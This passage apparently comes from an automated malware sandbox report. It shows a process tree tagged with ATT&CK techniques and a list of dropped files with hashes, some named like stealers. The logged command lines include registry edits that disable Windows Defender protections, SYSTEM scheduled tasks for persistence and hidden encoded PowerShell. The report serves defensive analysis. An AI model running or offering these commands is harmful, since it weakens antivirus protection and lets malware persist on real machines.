                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2220
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "cszbzSIAjSjUwyOsr" /SC once /ST 00:35:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\gyFPsfw.exe\" bH /ceTbdidwF 385121 /S" /V1 /F
                                                                                                                    3⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2104
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /run /I /tn "cszbzSIAjSjUwyOsr"
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2616
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 624
                                                                                                                    3⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Program crash
                                                                                                                    PID:1696
                                                                                                                • C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\gyFPsfw.exe
                                                                                                                  C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\gyFPsfw.exe bH /ceTbdidwF 385121 /S
                                                                                                                  2⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops Chrome extension
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2332
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    3⤵
                                                                                                                      PID:1476
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                        4⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2680
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2644
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            6⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:796
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                        4⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        PID:872
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                          5⤵
                                                                                                                            PID:2660
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                              6⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1932
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                          4⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:2024
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2824
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                              6⤵
                                                                                                                                PID:2228
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                            4⤵
                                                                                                                            • Indirect Command Execution
                                                                                                                            PID:2572
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                              5⤵
                                                                                                                                PID:1724
                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                  6⤵
                                                                                                                                    PID:3028
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                4⤵
                                                                                                                                • Indirect Command Execution
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:876
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  5⤵
                                                                                                                                    PID:1960
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                      6⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:2352
                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                        7⤵
                                                                                                                                          PID:2060
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /DELETE /F /TN "bmbXFarNlpbNUcjZUs"
                                                                                                                                  3⤵
                                                                                                                                    PID:2252
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                    3⤵
                                                                                                                                      PID:2748
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                        4⤵
                                                                                                                                        • Indirect Command Execution
                                                                                                                                        PID:2020
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                          5⤵
                                                                                                                                            PID:540
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                              6⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              PID:2872
                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1600
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                          4⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          PID:2348
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                            5⤵
                                                                                                                                              PID:1328
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                6⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1104
                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                  7⤵
                                                                                                                                                    PID:296
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kVyftiaSU\miAoqu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HlGMqKYvccXUYlk" /V1 /F
                                                                                                                                            3⤵
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2468
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "HlGMqKYvccXUYlk2" /F /xml "C:\Program Files (x86)\kVyftiaSU\OyZwaOz.xml" /RU "SYSTEM"
                                                                                                                                            3⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2020
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /END /TN "HlGMqKYvccXUYlk"
                                                                                                                                            3⤵
                                                                                                                                              PID:1632
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "HlGMqKYvccXUYlk"
                                                                                                                                              3⤵
                                                                                                                                                PID:2368
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "jcvlsaWlukqsKE" /F /xml "C:\Program Files (x86)\vECSWYHhNEBU2\JcmbbES.xml" /RU "SYSTEM"
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:1040
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "DNmCZKMScDllc2" /F /xml "C:\ProgramData\NUEAEvpmbtRdsZVB\gVYhzlt.xml" /RU "SYSTEM"
                                                                                                                                                3⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:1928
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "SebvePPLQQlbTkynf2" /F /xml "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR\GHtYCeK.xml" /RU "SYSTEM"
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:2756
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "BvByqijJTTwWPkViWve2" /F /xml "C:\Program Files (x86)\EKfHLQOzikZzC\qvCrBMr.xml" /RU "SYSTEM"
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:1768
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "hjqxuCHRKqyyPIyfi" /SC once /ST 00:12:09 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VLvKqTazivYGshTO\uFduiAYX\crkODni.dll\",#1 /oWpDdidqRB 385121" /V1 /F
                                                                                                                                                3⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:3016
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /run /I /tn "hjqxuCHRKqyyPIyfi"
                                                                                                                                                3⤵
                                                                                                                                                  PID:752
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "cszbzSIAjSjUwyOsr"
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:980
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 1568
                                                                                                                                                  3⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:328
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\uFduiAYX\crkODni.dll",#1 /oWpDdidqRB 385121
                                                                                                                                                2⤵
                                                                                                                                                  PID:2280
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\uFduiAYX\crkODni.dll",#1 /oWpDdidqRB 385121
                                                                                                                                                    3⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:2688
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "hjqxuCHRKqyyPIyfi"
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1860
                                                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                                                taskeng.exe {3B795F59-3013-4A88-9782-5492F8CF4AE9} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
                                                                                                                                                1⤵
                                                                                                                                                  PID:2380
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:3044
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                    2⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1764
                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2668
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                      2⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2332
                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1696
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                        2⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        PID:1768
                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2988
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1984
                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2956
                                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2688
                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2588

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                              Filesize

                                                                                                                                                              2.1MB

                                                                                                                                                              MD5

                                                                                                                                                              85edd375b71e8775d84a95ce468ab24a

                                                                                                                                                              SHA1

                                                                                                                                                              599ac915bf2314de801c69a369ff2c2c073956ad

                                                                                                                                                              SHA256

                                                                                                                                                              136c9134ddcee879a9f6861c65963dc54dec9f80cbb2418d051b05d08a5069b4

                                                                                                                                                              SHA512

                                                                                                                                                              7b1a1cdac2bd61c034b9e42e515a45178f2f57ec81f0b6345f814c3a0ae411abd08c4412a150e256e3c460e168dfcef379e8e9cbbe203c467eae8c9cdd148a72

                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                              Filesize

                                                                                                                                                              342B

                                                                                                                                                              MD5

                                                                                                                                                              a3606488266979e2f7cfbe37114c7b79

                                                                                                                                                              SHA1

                                                                                                                                                              60844ecbaf7218ef46c640a2043a84267fd2ce59

                                                                                                                                                              SHA256

                                                                                                                                                              edb00d419ac510d41c59141050837f2d23afc9d0df94a3e630404388a96436d2

                                                                                                                                                              SHA512

                                                                                                                                                              f774ae7b45b88caaef5989b1ba33fa0104669411529633ff083549605c996a4963a881b4af579d9e6008cf7fe125b553711e7bc156182f47d432e4dff7d4a5b2

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              187B

                                                                                                                                                              MD5

                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                              SHA1

                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                              SHA256

                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                              SHA512

                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              136B

                                                                                                                                                              MD5

                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                              SHA1

                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                              SHA256

                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                              SHA512

                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              150B

                                                                                                                                                              MD5

                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                              SHA1

                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                              SHA256

                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                              SHA512

                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              10KB

                                                                                                                                                              MD5

                                                                                                                                                              8f892de70dd4c9b1bcff2e50a5e69d07

                                                                                                                                                              SHA1

                                                                                                                                                              02bf5d875a03f1044bf56b49e82c52d9e2cf5c39

                                                                                                                                                              SHA256

                                                                                                                                                              45abebf7cfa97645e8a2ee1273e87eb8f9b8cfdb7a3d22fd50213fac341d81b2

                                                                                                                                                              SHA512

                                                                                                                                                              ad6f46deb7be1a4dc4691eae9f9b86e89b3b920fb3b17b64a5d094eb202e9e6808160b56def90e0f694e95237df8619c5fe350cca98ec05bfa3ec19c9ab781da

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe

                                                                                                                                                              Filesize

                                                                                                                                                              312KB

                                                                                                                                                              MD5

                                                                                                                                                              389881b424cf4d7ec66de13f01c7232a

                                                                                                                                                              SHA1

                                                                                                                                                              d3bc5a793c1b8910e1ecc762b69b3866e4c5ba78

                                                                                                                                                              SHA256

                                                                                                                                                              9d1211b3869ca43840b7da1677b257ad37521aab47719c6fcfe343121760b746

                                                                                                                                                              SHA512

                                                                                                                                                              2b9517d5d9d972e8754a08863a29e3d3e3cfde58e20d433c85546c2298aad50ac8b069cafd5abb3c86e24263d662c6e1ea23c0745a2668dfd215ddbdfbd1ab96

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.1MB

                                                                                                                                                              MD5

                                                                                                                                                              ec23d4868753f523df127f531451dcbd

                                                                                                                                                              SHA1

                                                                                                                                                              8a172e091d057a8db1e3e1999d48060967b99f36

                                                                                                                                                              SHA256

                                                                                                                                                              5a4308d45dc245870376ece2209450e5ca46872e632c81c3c61178f139ef223d

                                                                                                                                                              SHA512

                                                                                                                                                              2e7b63f43a49514d9c98f4ef1964d4ad2b2eef5d88500098246a31d6391f68715bd2a216a662836815615fe4cc2410fe32eacfdd0d7b3cf16f58c816a0c651fb

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

                                                                                                                                                              Filesize

                                                                                                                                                              416KB

                                                                                                                                                              MD5

                                                                                                                                                              f5d7b79ee6b6da6b50e536030bcc3b59

                                                                                                                                                              SHA1

                                                                                                                                                              751b555a8eede96d55395290f60adc43b28ba5e2

                                                                                                                                                              SHA256

                                                                                                                                                              2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

                                                                                                                                                              SHA512

                                                                                                                                                              532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000045001\Office2024.exe

                                                                                                                                                              Filesize

                                                                                                                                                              2.7MB

                                                                                                                                                              MD5

                                                                                                                                                              df92abd264b50c9f069246a6e65453f0

                                                                                                                                                              SHA1

                                                                                                                                                              f5025a44910ceddf26fb3fffb5da28ea93ee1a20

                                                                                                                                                              SHA256

                                                                                                                                                              bc7d010eb971dbc9cbeedc543f93bb1b6924d57597e213dbe10c2c1efd8d0296

                                                                                                                                                              SHA512

                                                                                                                                                              a3f48831efa65cea6a2cf313f698b59d84119023196e11b1266d937a5b4c05aa4aab67c6d40450bef5c9245b46316980906fa73196d892f2880abc2b1b863455

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                                                                                                                              Filesize

                                                                                                                                                              187KB

                                                                                                                                                              MD5

                                                                                                                                                              7a02aa17200aeac25a375f290a4b4c95

                                                                                                                                                              SHA1

                                                                                                                                                              7cc94ca64268a9a9451fb6b682be42374afc22fd

                                                                                                                                                              SHA256

                                                                                                                                                              836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e

                                                                                                                                                              SHA512

                                                                                                                                                              f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe

                                                                                                                                                              Filesize

                                                                                                                                                              6.4MB

                                                                                                                                                              MD5

                                                                                                                                                              4475bfcbfea874adedc1a2818afe4c87

                                                                                                                                                              SHA1

                                                                                                                                                              607ec3e9578f6ea4ee0059911d8170ca84d5f78d

                                                                                                                                                              SHA256

                                                                                                                                                              638dd1f701aec57c51765e330c7c4664d8913cb3d0e54bb1c102bdbe30452ecc

                                                                                                                                                              SHA512

